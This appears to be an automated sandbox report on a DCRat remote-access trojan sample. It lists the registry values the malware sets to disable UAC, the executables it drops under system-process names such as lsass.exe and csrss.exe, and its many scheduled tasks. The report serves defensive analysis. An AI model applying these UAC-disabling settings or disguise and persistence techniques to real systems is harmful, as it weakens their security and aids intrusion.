Malware Analysis Report

2024-11-15 05:49

Sample ID 240514-x3rflacg64
Target 1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics
SHA256 a9ac10090fed177df3867fc88eda57dd852c595dde10953b7b798523e1043152
Tags
rat dcrat evasion execution infostealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a9ac10090fed177df3867fc88eda57dd852c595dde10953b7b798523e1043152

Threat Level: Known bad

The file 1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics was found to be: Known bad.

Malicious Activity Summary

rat dcrat evasion execution infostealer trojan

UAC bypass

Dcrat family

DCRat payload

DcRat

Process spawned unexpected child process

DCRat payload

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Executes dropped EXE

Checks whether UAC is enabled

Drops file in Windows directory

Drops file in Program Files directory

Unsigned PE

Enumerates physical storage devices

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: CmdExeWriteProcessMemorySpam

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

System policy modification

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-14 19:23

Signatures

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Dcrat family

dcrat

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-14 19:23

Reported

2024-05-14 19:25

Platform

win7-20240221-en

Max time kernel

150s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe"

Signatures

DcRat

rat infostealer dcrat

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Windows Mail\en-US\spoolsv.exe C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files (x86)\Windows Mail\en-US\RCXB01F.tmp C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files (x86)\Google\Update\services.exe C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files (x86)\Windows Mail\en-US\RCXB030.tmp C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files (x86)\Windows Mail\en-US\spoolsv.exe C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File created C:\Program Files (x86)\Google\Update\services.exe C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File created C:\Program Files (x86)\Google\Update\c5b4cb5e9653cc C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File created C:\Program Files (x86)\Windows Mail\en-US\f3b6ecef712a24 C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files (x86)\Google\Update\RCXA8BA.tmp C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Program Files (x86)\Google\Update\RCXA8DA.tmp C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\LiveKernelReports\lsass.exe C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\debug\WIA\RCXB92B.tmp C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File created C:\Windows\ShellNew\886983d96e3d3e C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File created C:\Windows\debug\WIA\smss.exe C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\LiveKernelReports\RCXAB8A.tmp C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\LiveKernelReports\lsass.exe C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File created C:\Windows\LiveKernelReports\6203df4a6bafc7 C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\LiveKernelReports\RCXAB0D.tmp C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\ShellNew\RCXB707.tmp C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\debug\WIA\RCXB91B.tmp C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File created C:\Windows\ShellNew\csrss.exe C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File created C:\Windows\debug\WIA\69ddcba757bf72 C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\ShellNew\RCXB6F7.tmp C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\ShellNew\csrss.exe C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
File opened for modification C:\Windows\debug\WIA\smss.exe C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Recovery\8f9e55a2-d10b-11ee-8d36-fdfbfcab7b96\sppsvc.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
